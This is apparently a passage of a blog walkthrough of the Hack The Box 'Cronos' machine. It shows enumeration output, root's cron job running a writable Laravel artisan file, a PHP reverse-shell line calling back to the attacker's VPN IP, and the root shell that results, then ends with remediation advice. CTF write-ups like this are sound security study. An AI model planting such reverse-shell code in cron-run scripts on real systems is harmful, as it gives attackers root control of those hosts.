[!] sys030 Can we read /etc/shadow file?................................... nope

[!] sys030 Can we read /etc/shadow- file?.................................. nope

[!] sys030 Can we read /etc/shadow~ file?.................................. nope

[!] sys030 Can we read /etc/master.passwd file?............................ nope

[*] sys040 Check for other superuser accounts.............................. nope

[*] sys050 Can root user log in via SSH?................................... nope

[i] sys060 List available shells........................................... skip

[i] sys070 System umask in /etc/login.defs................................. skip                                

[i] sys080 System password policies in /etc/login.defs..................... skip                                

===============================================================( security )=====                                

[*] sec000 Is SELinux present?............................................. nope

[*] sec010 List files with capabilities.................................... yes!

[!] sec020 Can we write to a binary with caps?............................. nope

[!] sec030 Do we have all caps in any binary?.............................. nope

[*] sec040 Users with associated capabilities.............................. nope

[!] sec050 Does current user have capabilities?............................ skip

========================================================( recurrent tasks )=====                                

[*] ret000 User crontab.................................................... nope

[!] ret010 Cron tasks writable by user..................................... nope

[*] ret020 Cron jobs....................................................... yes!

[*] ret030 Can we read user crontabs....................................... nope

[*] ret040 Can we list other user cron tasks?.............................. nope

[*] ret050 Can we write to any paths present in cron jobs.................. yes!

[!] ret060 Can we write to executable paths present in cron jobs........... yes!

---

/etc/crontab:* * * * *  root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

---

[i] ret400 Cron files...................................................... skip

[*] ret500 User systemd timers............................................. nope                                

[!] ret510 Can we write in any system timer?............................... nope

[i] ret900 Systemd timers.................................................. skip

================================================================( network )=====                                

[*] net000 Services listening only on localhost............................ yes!

[!] net010 Can we sniff traffic with tcpdump?.............................. nope

[i] net500 NIC and IP information.......................................... skip

[i] net510 Routing table................................................... skip                                

[i] net520 ARP table....................................................... skip                                

[i] net530 Namerservers.................................................... skip                                

[i] net540 Systemd Nameservers............................................. skip                                

[i] net550 Listening TCP................................................... skip                                

[i] net560 Listening UDP................................................... skip                                

===============================================================( services )=====                                

[!] srv000 Can we write in service files?.................................. nope

[!] srv010 Can we write in binaries executed by services?.................. nope

[*] srv020 Files in /etc/init.d/ not belonging to root..................... nope

[*] srv030 Files in /etc/rc.d/init.d not belonging to root................. nope

[*] srv040 Upstart files not belonging to root............................. nope

[*] srv050 Files in /usr/local/etc/rc.d not belonging to root.............. nope

[i] srv400 Contents of /etc/inetd.conf..................................... skip

[i] srv410 Contents of /etc/xinetd.conf.................................... skip                                

[i] srv420 List /etc/xinetd.d if used...................................... skip                                

[i] srv430 List /etc/init.d/ permissions................................... skip                                

[i] srv440 List /etc/rc.d/init.d permissions............................... skip                                

[i] srv450 List /usr/local/etc/rc.d permissions............................ skip                                

[i] srv460 List /etc/init/ permissions..................................... skip                                

[!] srv500 Can we write in systemd service files?.......................... nope                                

[!] srv510 Can we write in binaries executed by systemd services?.......... nope

[*] srv520 Systemd files not belonging to root............................. nope

[i] srv900 Systemd config files permissions................................ skip

==============================================================( processes )=====                                

[!] pro000 Can we write in any process binary?............................. nope

[*] pro010 Processes running with root permissions......................... yes!

[i] pro500 Running processes............................................... skip

[i] pro510 Running process binaries and permissions........................ skip                                

===============================================================( software )=====                                

[!] sof000 Can we connect to MySQL with root/root credentials?............. nope

[!] sof010 Can we connect to MySQL as root without password?............... nope

[!] sof020 Can we connect to PostgreSQL template0 as postgres and no pass?. nope

[!] sof020 Can we connect to PostgreSQL template1 as postgres and no pass?. nope

[!] sof020 Can we connect to PostgreSQL template0 as psql and no pass?..... nope

[!] sof020 Can we connect to PostgreSQL template1 as psql and no pass?..... nope

[*] sof030 Installed apache modules........................................ yes!

[!] sof040 Found any .htpasswd files?...................................... nope

[i] sof500 Sudo version.................................................... skip

[i] sof510 MySQL version................................................... skip                                

[i] sof520 Postgres version................................................ skip                                

[i] sof530 Apache version.................................................. skip                                

=============================================================( containers )=====                                

[*] ctn000 Are we in a docker container?................................... nope

[*] ctn010 Is docker available?............................................ nope

[!] ctn020 Is the user a member of the 'docker' group?..................... nope

[*] ctn200 Are we in a lxc container?...................................... nope

[!] ctn210 Is the user a member of any lxc/lxd group?...................... nope



==================================( FINISHED )==================================



 

utilising cron for privilege escalation

There are probably a few avenues here, but the thing that sticks out to me the most is that there is a writable cron job that is running as root:


[!] ret060 Can we write to executable paths present in cron jobs........... yes!

---

/etc/crontab:* * * * *  root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1

---

Since this script is being run as the www-data user we are logged into, we should be able to write to /var/www/laravel/artisan to spawn a root shell.

Let’s go ahead and start another local listener with nc -lvnp 1234

Now let’s check out /var/www/laravel/artisan:


$ ll /var/www/laravel/artisan

-rwxr-xr-x 1 www-data www-data 1646 Apr  9  2017 /var/www/laravel/artisan

Sicne this is owned by the www-data user, the user we’re logged in as, we can edit this file. Furthermore, it looks like the job is getting run every minute by root, so we shouldn’t have to wait much for a shell to spawn.

We know from the cron job, it’s likely a php script; let’s confirm and have a look:


$ cat /var/www/laravel/artisan

#!/usr/bin/env php

<?php



/*

|--------------------------------------------------------------------------

| Register The Auto Loader

|--------------------------------------------------------------------------

|

| Composer provides a convenient, automatically generated class loader

| for our application. We just need to utilize it! We'll require it

| into the script here so that we do not have to worry about the

| loading of any our classes "manually". Feels great to relax.

|

*/



require __DIR__.'/bootstrap/autoload.php';



$app = require_once __DIR__.'/bootstrap/app.php';



/*

|--------------------------------------------------------------------------

| Run The Artisan Application

|--------------------------------------------------------------------------

|

| When we run the console application, the current CLI command will be

| executed in this console and the response sent back to a terminal

| or another output device for the developers. Here goes nothing!

|

*/



$kernel = $app->make(Illuminate\Contracts\Console\Kernel::class);



$status = $kernel->handle(

    $input = new Symfony\Component\Console\Input\ArgvInput,

    new Symfony\Component\Console\Output\ConsoleOutput

);



/*

|--------------------------------------------------------------------------

| Shutdown The Application

|--------------------------------------------------------------------------

|

| Once Artisan has finished running. We will fire off the shutdown events

| so that any final work may be done by the application before we shut

| down the process. This is the last thing to happen to the request.

|

*/



$kernel->terminate($input, $status);



exit($status);

Going back to the PentestMonkey shell cheat sheet, we see that we can make a php reverse shell like so:

</code>php -r ‘$sock=fsockopen(“",1234);exec("/bin/sh -i <&3 >&3 2>&3");'</code>

So let’s add this to the artisan file, before the PHP comment section, like so:


#!/usr/bin/env php

<?php

$sock=fsockopen("<VPN IP>",1234);exec("/bin/sh -i <&3 >&3 2>&3");

And after a moment, in our listener, we get a root shell!


root@kali:/writeups/HTB/cronos/enumeration# nc -lvnp 1234

listening on [any] 1234 ...

connect to [10.10.14.50] from (UNKNOWN) [10.10.10.13] 44968

/bin/sh: 0: can't access tty; job control turned off

# whoami

root

# id

uid=0(root) gid=0(root) groups=0(root)

# pwd

/root

# 



Great, from here we can grab the root flag and call it a day:


# ls -ltr

total 4

-r-------- 1 root root 33 Mar 22  2017 root.txt

# 

 

Conclusion

Remediation Recommendations

  • Protections against DNS Zone Transfers should be implemented. Some great info can be found here

  • Better input validation/input sanitization is needed on the admin login page. A WAF could potentially help reduce this risk.

  • Better input validation is also needed for the net tool application - characters such as && and ; should be filtered out to avoid running unintended commands. Or you could simply restrict input to numbers and periods.

  • The php cron job vulnerabiltiy needs to be addressed. This could likely be done one of two ways:

    • Permissions on the file the cron job is executing need to be locked down, if possible (such as chmod 500 after initial setup)

    • The cron job should not run as root, if possible, and run as a less privileged user.

 

 

That’s all for this one.

~@initinfosec

hackthebox, HTB, writeups, walkthrough, hacking, pentest, OSCP prep
comments powered by Disqus